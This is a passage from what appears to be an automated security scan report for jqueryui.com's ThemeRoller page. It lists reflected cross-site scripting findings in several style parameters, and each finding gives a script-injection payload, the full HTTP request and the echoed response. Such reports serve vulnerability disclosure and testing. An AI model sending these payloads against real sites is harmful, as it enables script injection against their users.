   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngcad01"><script>alert(1)</script>9374f53a89e&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.52. http://jqueryui.com/themeroller/ [borderColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b67c"><script>alert(1)</script>0674f60c158 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=9999992b67c"><script>alert(1)</script>0674f60c158&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=9999992b67c"><script>alert(1)</script>0674f60c158&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColor
...[SNIP]...

2.53. http://jqueryui.com/themeroller/ [borderColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57884"><script>alert(1)</script>b65ac416221 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa57884"><script>alert(1)</script>b65ac416221&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa57884"><script>alert(1)</script>b65ac416221&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorH
...[SNIP]...

2.54. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2586"><script>alert(1)</script>686e0674453 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999e2586"><script>alert(1)</script>686e0674453&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
g&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999e2586"><script>alert(1)</script>686e0674453&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada
...[SNIP]...

2.55. http://jqueryui.com/themeroller/ [borderColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8383"><script>alert(1)</script>069808b3d28 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0ac8383"><script>alert(1)</script>069808b3d28&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0ac8383"><script>alert(1)</script>069808b3d28&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&op
...[SNIP]...

2.56. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a58cc"><script>alert(1)</script>2f5ab107d8f was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaaa58cc"><script>alert(1)</script>2f5ab107d8f&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hemeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaaa58cc"><script>alert(1)</script>2f5ab107d8f&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8
...[SNIP]...

2.57. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6081e"><script>alert(1)</script>c30c52ff5c6 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa16081e"><script>alert(1)</script>c30c52ff5c6&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rd.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa16081e"><script>alert(1)</script>c30c52ff5c6&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaa
...[SNIP]...

2.58. http://jqueryui.com/themeroller/ [borderColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13c1f"><script>alert(1)</script>bc465936fd5 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=99999913c1f"><script>alert(1)</script>bc465936fd5&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=99999913c1f"><script>alert(1)</script>bc465936fd5&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=f
...[SNIP]...

2.59. http://jqueryui.com/themeroller/ [cornerRadius parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 707ae"><script>alert(1)</script>2116519edf5 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px707ae"><script>alert(1)</script>2116519edf5&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px707ae"><script>alert(1)</script>2116519edf5&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgIm
...[SNIP]...

2.60. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67b25"><script>alert(1)</script>6776f4259fb was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px67b25"><script>alert(1)</script>6776f4259fb HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
yOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px67b25"><script>alert(1)</script>6776f4259fb" type="text/css" media="all" />
...[SNIP]...

2.61. http://jqueryui.com/themeroller/ [fcActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a818"><script>alert(1)</script>bc6a78482e was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

